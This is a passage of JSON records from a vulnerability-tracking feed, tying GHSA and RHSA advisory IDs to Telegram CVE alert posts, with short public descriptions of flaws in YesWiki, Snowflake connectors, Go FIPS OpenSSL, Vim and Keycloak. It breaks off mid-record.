https://github.com/snowflakedb/snowflake-connector-nodejs/commit/e94c24112271e1f44c271634bf29a3188acc68d0", "creation_timestamp": "2025-04-28T23:10:54.000000Z"}, {"uuid": "8faeefc7-6157-4b2e-a352-a2adc5464db4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WC9G-6J9W-HR95", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13929", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46348\n\ud83d\udd25 CVSS Score: 10 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: YesWiki is a wiki system written in PHP. Prior to version 4.5.4, the request to commence a site backup can be performed and downloaded without authentication. The archives are created with a predictable filename, so a malicious user could create and download an archive without being authenticated. This could result in a malicious attacker making numerous requests to create archives and fill up the file system, or by downloading the archive which contains sensitive site information. This issue has been patched in version 4.5.4.\n\ud83d\udccf Published: 2025-04-29T20:39:40.423Z\n\ud83d\udccf Modified: 2025-04-29T20:39:40.423Z\n\ud83d\udd17 References:\n1. https://github.com/YesWiki/yeswiki/security/advisories/GHSA-wc9g-6j9w-hr95\n2. https://github.com/YesWiki/yeswiki/commit/0d4efc880a727599fa4f6d7a64cc967afe475530", "creation_timestamp": "2025-04-29T21:13:32.000000Z"}, {"uuid": "15b3bbb5-d1ec-40c5-aef8-01f4a7c2c9a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-22C4-238C-M5J4", "type": "published-proof-of-concept", "source": "Telegram/TC_jlHJMv9N6S0B2yz3RFhhjLUk96NJtTkRt7NB8H70qfRI", "content": "", "creation_timestamp": "2026-04-16T05:17:50.000000Z"}, {"uuid": "bea715b4-c144-425f-a34d-9f5d1dcdb5bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G596-MF82-W8C3", "type": "published-proof-of-concept", "source": "Telegram/TC_jlHJMv9N6S0B2yz3RFhhjLUk96NJtTkRt7NB8H70qfRI", "content": "", "creation_timestamp": "2026-04-16T05:17:50.000000Z"}, {"uuid": "532dc66e-89b7-4d4e-81ed-f0a30133c079", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9551", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/270", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9355\n\ud83d\udd39 Description: A vulnerability was found in Golang FIPS OpenSSL. This flaw allows a malicious user to randomly cause an uninitialized buffer length variable with a zeroed buffer to be returned in FIPS mode. It may also be possible to force a false positive match between non-equal hashes when comparing a trusted computed hmac sum to an untrusted input sum if an attacker can send a zeroed buffer in place of a pre-computed sum.\u00a0 It is also possible to force a derived key to be all zeros instead of an unpredictable value.\u00a0 This may have follow-on implications for the Go TLS stack.\n\ud83d\udccf Published: 2024-10-01T18:17:29.420Z\n\ud83d\udccf Modified: 2025-01-06T22:01:58.132Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10133\n2. https://access.redhat.com/errata/RHSA-2024:7502\n3. https://access.redhat.com/errata/RHSA-2024:7550\n4. https://access.redhat.com/errata/RHSA-2024:8327\n5. https://access.redhat.com/errata/RHSA-2024:8678\n6. https://access.redhat.com/errata/RHSA-2024:8847\n7. https://access.redhat.com/errata/RHSA-2024:9551\n8. https://access.redhat.com/security/cve/CVE-2024-9355\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2315719", "creation_timestamp": "2025-01-06T22:38:12.000000Z"}, {"uuid": "886ee21a-d147-4f53-93b1-9b1c16d8f6ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:7502", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/270", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9355\n\ud83d\udd39 Description: A vulnerability was found in Golang FIPS OpenSSL. This flaw allows a malicious user to randomly cause an uninitialized buffer length variable with a zeroed buffer to be returned in FIPS mode. It may also be possible to force a false positive match between non-equal hashes when comparing a trusted computed hmac sum to an untrusted input sum if an attacker can send a zeroed buffer in place of a pre-computed sum.\u00a0 It is also possible to force a derived key to be all zeros instead of an unpredictable value.\u00a0 This may have follow-on implications for the Go TLS stack.\n\ud83d\udccf Published: 2024-10-01T18:17:29.420Z\n\ud83d\udccf Modified: 2025-01-06T22:01:58.132Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10133\n2. https://access.redhat.com/errata/RHSA-2024:7502\n3. https://access.redhat.com/errata/RHSA-2024:7550\n4. https://access.redhat.com/errata/RHSA-2024:8327\n5. https://access.redhat.com/errata/RHSA-2024:8678\n6. https://access.redhat.com/errata/RHSA-2024:8847\n7. https://access.redhat.com/errata/RHSA-2024:9551\n8. https://access.redhat.com/security/cve/CVE-2024-9355\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2315719", "creation_timestamp": "2025-01-06T22:38:12.000000Z"}, {"uuid": "370ffc8b-2d1c-4d28-91b9-b6898ea3ac44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-28VG-3HV7-W92F", "type": "published-proof-of-concept", "source": "Telegram/Aucjp3CgnELaS6Gr5NTHztcQZsmAAmJEC2bwRSYMi6Gi6QU", "content": "", "creation_timestamp": "2026-04-16T21:20:19.000000Z"}, {"uuid": "cdc4abac-3eb6-4c35-9bef-dd0eeeffe119", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C82R-C9F7-F5MJ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13752", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46326\n\ud83d\udd25 CVSS Score: 3.3 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: snowflake-connector-net is the Snowflake Connector for .NET. Versions starting from 2.1.2 to before 4.4.1, are vulnerable to a Time-of-Check to Time-of-Use (TOCTOU) race condition. When using the Easy Logging feature on Linux and macOS, the Connector reads logging configuration from a user-provided file. On Linux and macOS, the Connector verifies that the configuration file can be written to only by its owner. That check was vulnerable to a TOCTOU race condition and failed to verify that the file owner matches the user running the Connector. This could allow a local attacker with write access to the configuration file or the directory containing it to overwrite the configuration and gain control over logging level and output location. This issue has been patched in version 4.4.1.\n\ud83d\udccf Published: 2025-04-28T22:33:01.627Z\n\ud83d\udccf Modified: 2025-04-28T22:33:01.627Z\n\ud83d\udd17 References:\n1. https://github.com/snowflakedb/snowflake-connector-net/security/advisories/GHSA-c82r-c9f7-f5mj\n2. https://github.com/snowflakedb/snowflake-connector-net/commit/393aad3cfa81045a05dd488944db45256e861bff\n3. https://github.com/snowflakedb/snowflake-connector-net/releases/tag/v4.4.1", "creation_timestamp": "2025-04-28T23:10:56.000000Z"}, {"uuid": "a553d916-7ab3-448c-995c-a5ec956f0022", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-944X-93JF-H3RX", "type": "published-proof-of-concept", "source": "Telegram/Aucjp3CgnELaS6Gr5NTHztcQZsmAAmJEC2bwRSYMi6Gi6QU", "content": "", "creation_timestamp": "2026-04-16T21:20:19.000000Z"}, {"uuid": "5ca1418f-ba0f-4365-9dd5-2ace428cd4b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PGH3-RGW3-XJMM", "type": "published-proof-of-concept", "source": "Telegram/Aucjp3CgnELaS6Gr5NTHztcQZsmAAmJEC2bwRSYMi6Gi6QU", "content": "", "creation_timestamp": "2026-04-16T21:20:19.000000Z"}, {"uuid": "f8ace1a3-648b-4f52-88de-d4b2ee39249c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78CV-MQJ4-43F7", "type": "published-proof-of-concept", "source": "Telegram/pXUM2jaw9GgU28Sl0meXOcFoAiVepufvCfRhEfvGcf7OCXo", "content": "", "creation_timestamp": "2026-04-03T05:15:36.000000Z"}, {"uuid": "28b6ed68-17c1-4b8c-8e6f-7d30163c8d5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VW86-C94W-V3X4", "type": "published-proof-of-concept", "source": "Telegram/L_7r3B6HZ1No5mrz6_jolg2h46aKqgVbGrSL49d6iAO6fVY", "content": "", "creation_timestamp": "2026-04-17T01:16:10.000000Z"}, {"uuid": "9b24ce81-0590-4e60-9421-f7ddb3427a60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WHV5-4Q2F-Q68G", "type": "published-proof-of-concept", "source": "Telegram/613aY007LGHyW6_rIrja4BsrlzuBvUbPzSCrjge10VR5WoE", "content": "", "creation_timestamp": "2026-04-02T15:21:07.000000Z"}, {"uuid": "f74b035b-87b2-475f-a5c7-ee7c236cf951", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3GW8-3MG3-JMPC", "type": "published-proof-of-concept", "source": "Telegram/613aY007LGHyW6_rIrja4BsrlzuBvUbPzSCrjge10VR5WoE", "content": "", "creation_timestamp": "2026-04-02T15:21:07.000000Z"}, {"uuid": "eafaf51e-ef9d-48da-bc04-6964b98a3012", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-693P-M996-3RMF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14623", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-29768\n\ud83d\udd25 CVSS Score: 4.4 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: Vim, a text editor, is vulnerable to potential data loss with zip.vim and special crafted zip files in versions prior to 9.1.1198. The impact is medium because a user must be made to view such an archive with Vim and then press 'x' on such a strange filename. The issue has been fixed as of Vim patch v9.1.1198.\n\ud83d\udccf Published: 2025-03-13T17:04:56.920Z\n\ud83d\udccf Modified: 2025-05-02T23:03:03.457Z\n\ud83d\udd17 References:\n1. https://github.com/vim/vim/security/advisories/GHSA-693p-m996-3rmf\n2. https://github.com/vim/vim/commit/f209dcd3defb95bae21b2740910e6aa7bb940531", "creation_timestamp": "2025-05-02T23:17:17.000000Z"}, {"uuid": "ddf12b39-02d6-4275-8981-8a5a87a46f67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9PR4-RF97-79QH", "type": "published-proof-of-concept", "source": "Telegram/OCRuCpCrMYyNHl7tK2WvZ5-EwER3iqlB4XvdcqwHWSl_drs", "content": "", "creation_timestamp": "2026-04-17T03:16:02.000000Z"}, {"uuid": "54748492-6715-4993-ac1a-61a80b9acce5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-393C-P46R-7C95", "type": "seen", "source": "Telegram/HFSRmPQIuJm0mhlgKTjgnUZc9IKWtHrGIbUWbiDZawdQwcQ", "content": "", "creation_timestamp": "2026-04-09T19:22:33.000000Z"}, {"uuid": "7a416626-3882-45c2-9dca-fde592a86d2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5GFJ-64GH-MGMW", "type": "seen", "source": "Telegram/opWNLDaOjT2KiHYbiGpHGLhTmz3SmMLK1wCf8I-JAwAiArQ", "content": "", "creation_timestamp": "2026-04-09T19:23:08.000000Z"}, {"uuid": "572b9c2d-6060-4a03-9d77-af815ab1ceea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9P93-7J67-5PC2", "type": "published-proof-of-concept", "source": "Telegram/n2dd6XRjJv9G8jt1S2EaZawu98TdZ3-sGq35ZGwXZFcMAwI", "content": "", "creation_timestamp": "2026-04-09T23:30:23.000000Z"}, {"uuid": "a26e30bd-b613-4d01-a200-6617608b4995", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7XR2-Q9VF-X4R5", "type": "published-proof-of-concept", "source": "Telegram/n2dd6XRjJv9G8jt1S2EaZawu98TdZ3-sGq35ZGwXZFcMAwI", "content": "", "creation_timestamp": "2026-04-09T23:30:23.000000Z"}, {"uuid": "c0c0c290-37a2-4283-878c-95919d90ae4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VFG3-PQPQ-93M4", "type": "seen", "source": "Telegram/G3Fi-nNLRGY8ZLcJORLcPgOLisPY2kSgZDa_wKJf-COsCMo", "content": "", "creation_timestamp": "2026-04-09T23:30:34.000000Z"}, {"uuid": "c2c8f1e7-5119-4db1-9d6b-56ba064400b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H4JX-HJR3-FHGC", "type": "seen", "source": "Telegram/G3Fi-nNLRGY8ZLcJORLcPgOLisPY2kSgZDa_wKJf-COsCMo", "content": "", "creation_timestamp": "2026-04-09T23:30:34.000000Z"}, {"uuid": "8ac45821-f996-4a94-a788-b601215b41e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HF68-49FM-59CQ", "type": "seen", "source": "Telegram/G3Fi-nNLRGY8ZLcJORLcPgOLisPY2kSgZDa_wKJf-COsCMo", "content": "", "creation_timestamp": "2026-04-09T23:30:34.000000Z"}, {"uuid": "acbc6576-65fe-409f-b729-268744bcb7a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FMWV-62WF-2HGX", "type": "seen", "source": "Telegram/m01DCzKFy5kAt_T9sjIWhyEARPkz65_AkyqWTYGgzfJ1E6g", "content": "", "creation_timestamp": "2026-04-06T23:22:09.000000Z"}, {"uuid": "4f954b4b-a040-4daa-a610-ab091c9bdaa8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5QHV-X9J4-C3VM", "type": "seen", "source": "Telegram/m01DCzKFy5kAt_T9sjIWhyEARPkz65_AkyqWTYGgzfJ1E6g", "content": "", "creation_timestamp": "2026-04-06T23:22:09.000000Z"}, {"uuid": "d51cb81b-e509-48ef-b2e4-6e87eabf95d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WV3H-5FX7-966H", "type": "seen", "source": "Telegram/m01DCzKFy5kAt_T9sjIWhyEARPkz65_AkyqWTYGgzfJ1E6g", "content": "", "creation_timestamp": "2026-04-06T23:22:09.000000Z"}, {"uuid": "9fa75d70-03e9-4c19-ae7a-f3f569045632", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-43JM-PCRQ-W7GV", "type": "seen", "source": "Telegram/m01DCzKFy5kAt_T9sjIWhyEARPkz65_AkyqWTYGgzfJ1E6g", "content": "", "creation_timestamp": "2026-04-06T23:22:09.000000Z"}, {"uuid": "56a95437-6ead-4124-ac42-843fb9513810", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8X9R-HVWG-C55H", "type": "seen", "source": "Telegram/F-tbnQCu7KGoJ0u4OEM4TknejxA1jNnRqA-1uSHs9aPRtPw", "content": "", "creation_timestamp": "2026-04-06T23:22:19.000000Z"}, {"uuid": "139f48af-96be-4fff-8d21-eba95b13bf0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9R29-6JGC-3GGH", "type": "seen", "source": "Telegram/nb1jq11aD1wlJ1YglJrLy9zN5IvfOUCCPtd3YJ7-KFKCMzY", "content": "", "creation_timestamp": "2026-04-08T23:33:06.000000Z"}, {"uuid": "d01f2ec1-595c-4ed1-92be-25696b74a1bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GQQV-XWX3-JJ4H", "type": "published-proof-of-concept", "source": "Telegram/LyxiOFuM6k6JRrVhGkcWrU8R1Vj8dluNTy4xGDA54CBUTMw", "content": "", "creation_timestamp": "2026-04-09T01:26:43.000000Z"}, {"uuid": "a691721a-0e73-4032-9159-322abdcc9080", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J2P3-58M2-V6Q3", "type": "published-proof-of-concept", "source": "Telegram/LyxiOFuM6k6JRrVhGkcWrU8R1Vj8dluNTy4xGDA54CBUTMw", "content": "", "creation_timestamp": "2026-04-09T01:26:43.000000Z"}, {"uuid": "1d3eca66-e63e-49ca-b850-a6f59e057ee0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HCM9-CH62-5727", "type": "published-proof-of-concept", "source": "Telegram/LyxiOFuM6k6JRrVhGkcWrU8R1Vj8dluNTy4xGDA54CBUTMw", "content": "", "creation_timestamp": "2026-04-09T01:26:43.000000Z"}, {"uuid": "5b1b4694-6f33-486a-a98f-f694a21154d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-47JJ-7XFG-8759", "type": "published-proof-of-concept", "source": "Telegram/LyxiOFuM6k6JRrVhGkcWrU8R1Vj8dluNTy4xGDA54CBUTMw", "content": "", "creation_timestamp": "2026-04-09T01:26:43.000000Z"}, {"uuid": "0096ab26-f020-4ed2-87c1-5235202fcfac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FG9W-JG8F-4J94", "type": "published-proof-of-concept", "source": "Telegram/LyxiOFuM6k6JRrVhGkcWrU8R1Vj8dluNTy4xGDA54CBUTMw", "content": "", "creation_timestamp": "2026-04-09T01:26:43.000000Z"}, {"uuid": "48d6e960-53dd-4a50-b571-306c55d237ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G3G9-5VJ6-R3GJ", "type": "published-proof-of-concept", "source": "Telegram/uNEbWTFRO9kglbQXnY7zSMHaUxTxgzOMmWKv2o-GlQMO0RY", "content": "", "creation_timestamp": "2026-04-09T01:27:25.000000Z"}, {"uuid": "d4eb4af8-46b3-4ccd-904a-895c1830fbc3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QF73-2HRX-XPRP", "type": "published-proof-of-concept", "source": "Telegram/uNEbWTFRO9kglbQXnY7zSMHaUxTxgzOMmWKv2o-GlQMO0RY", "content": "", "creation_timestamp": "2026-04-09T01:27:25.000000Z"}, {"uuid": "5d0b0b31-3f2d-4854-ba30-938d84ebadd7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QHJ7-V7H7-Q4C7", "type": "seen", "source": "Telegram/s8qY890P48N3Wo9aQa8rI-zenhf5cWovFj-1HEcEoggzt84", "content": "", "creation_timestamp": "2026-04-02T17:37:38.000000Z"}, {"uuid": "4171488d-ecdf-4333-8ae9-64d5f426f997", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XVWW-XHX6-22PF", "type": "seen", "source": "Telegram/Wnflj9AVRNFcbzmT8RV9QbE39gd8mxBym86BZleqlS4uOZ8", "content": "", "creation_timestamp": "2026-04-02T19:26:54.000000Z"}, {"uuid": "53518d71-11e9-49c2-9b9d-47793127cb47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MV6H-V3JG-G539", "type": "published-proof-of-concept", "source": "Telegram/7DVhAvDfvaCSFfrp-315YEAfd2kaZp9OZJg_mE0wwvo2i8o", "content": "", "creation_timestamp": "2026-04-02T19:26:58.000000Z"}, {"uuid": "bac20de9-8cb7-48de-9654-057c4f0e0057", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2599-H6XX-HPXP", "type": "published-proof-of-concept", "source": "Telegram/7DVhAvDfvaCSFfrp-315YEAfd2kaZp9OZJg_mE0wwvo2i8o", "content": "", "creation_timestamp": "2026-04-02T19:26:58.000000Z"}, {"uuid": "6390f3cb-dedb-47fc-bf94-1116e068bfc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-89VP-M2QW-7V34", "type": "published-proof-of-concept", "source": "Telegram/7DVhAvDfvaCSFfrp-315YEAfd2kaZp9OZJg_mE0wwvo2i8o", "content": "", "creation_timestamp": "2026-04-02T19:26:58.000000Z"}, {"uuid": "8f7e873e-36ab-4355-b0e8-790abeeb777c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5RRM-6QMQ-2364", "type": "published-proof-of-concept", "source": "Telegram/zJs9VhJAI5JOvrL4hzeWnrOleMDgHArbbwhOuzjaL80cudA", "content": "", "creation_timestamp": "2026-04-02T19:27:20.000000Z"}, {"uuid": "9e630fa4-0f90-4020-8afc-4941a2f1c01a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-35XM-QVJG-8M42", "type": "published-proof-of-concept", "source": "Telegram/zJs9VhJAI5JOvrL4hzeWnrOleMDgHArbbwhOuzjaL80cudA", "content": "", "creation_timestamp": "2026-04-02T19:27:20.000000Z"}, {"uuid": "c8ff4442-eb13-4288-9055-6cf881f13898", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3382-GW9X-477V", "type": "published-proof-of-concept", "source": "Telegram/M6EVzZe60-ZK2hxHMbXVzi0icuKFKnAtI2GiQ0rZVKguBtE", "content": "", "creation_timestamp": "2026-04-15T23:25:44.000000Z"}, {"uuid": "f3578ccb-17b3-4fd7-b432-f32349d7cce9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HV99-MXM5-Q397", "type": "published-proof-of-concept", "source": "Telegram/M6EVzZe60-ZK2hxHMbXVzi0icuKFKnAtI2GiQ0rZVKguBtE", "content": "", "creation_timestamp": "2026-04-15T23:25:44.000000Z"}, {"uuid": "3d7d550c-6d43-4d02-bb14-65e97c6d3e02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H2JQ-G4CQ-5PPQ", "type": "seen", "source": "Telegram/tHMZo4_t_6KJ7O3rHGS3YAWNGCGRHee0g_il3YJsfVKclsQ", "content": "", "creation_timestamp": "2026-04-02T19:26:29.000000Z"}, {"uuid": "a8b493eb-4c73-40b3-9857-bc33f2e8ab6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8VQR-QJWX-82MW", "type": "seen", "source": "Telegram/tHMZo4_t_6KJ7O3rHGS3YAWNGCGRHee0g_il3YJsfVKclsQ", "content": "", "creation_timestamp": "2026-04-02T19:26:29.000000Z"}, {"uuid": "1efe0201-0544-4d40-9db8-437af06b66e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JJF9-W5VJ-R6VP", "type": "published-proof-of-concept", "source": "Telegram/7DVhAvDfvaCSFfrp-315YEAfd2kaZp9OZJg_mE0wwvo2i8o", "content": "", "creation_timestamp": "2026-04-02T19:26:58.000000Z"}, {"uuid": "9c0746d2-8a1c-41da-8454-528aeb407c81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VPRR-Q85P-79MF", "type": "published-proof-of-concept", "source": "Telegram/7DVhAvDfvaCSFfrp-315YEAfd2kaZp9OZJg_mE0wwvo2i8o", "content": "", "creation_timestamp": "2026-04-02T19:26:58.000000Z"}, {"uuid": "fca6ee1e-92c0-437f-9ee0-4d9f349eab0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6JGM-J7H2-2FQG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13751", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46327\n\ud83d\udd25 CVSS Score: 3.3 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: gosnowflake is the Snowflake Golang driver. Versions starting from 1.7.0 to before 1.13.3, are vulnerable to a Time-of-Check to Time-of-Use (TOCTOU) race condition. When using the Easy Logging feature on Linux and macOS, the Driver reads logging configuration from a user-provided file. On Linux and macOS the Driver verifies that the configuration file can be written to only by its owner. That check was vulnerable to a TOCTOU race condition and failed to verify that the file owner matches the user running the Driver. This could allow a local attacker with write access to the configuration file or the directory containing it to overwrite the configuration and gain control over logging level and output location. This issue has been patched in version 1.13.3.\n\ud83d\udccf Published: 2025-04-28T22:33:05.249Z\n\ud83d\udccf Modified: 2025-04-28T22:33:05.249Z\n\ud83d\udd17 References:\n1. https://github.com/snowflakedb/gosnowflake/security/advisories/GHSA-6jgm-j7h2-2fqg\n2. https://github.com/snowflakedb/gosnowflake/commit/ba94a4800e23621eff558ef18ce4b96ec5489ff0", "creation_timestamp": "2025-04-28T23:10:55.000000Z"}, {"uuid": "4efc9849-5991-4a1d-a472-de099b038d37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6502", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14620", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-7318\n\ud83d\udd25 CVSS Score: 4.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: A vulnerability was found in Keycloak. Expired OTP codes are still usable when using FreeOTP when 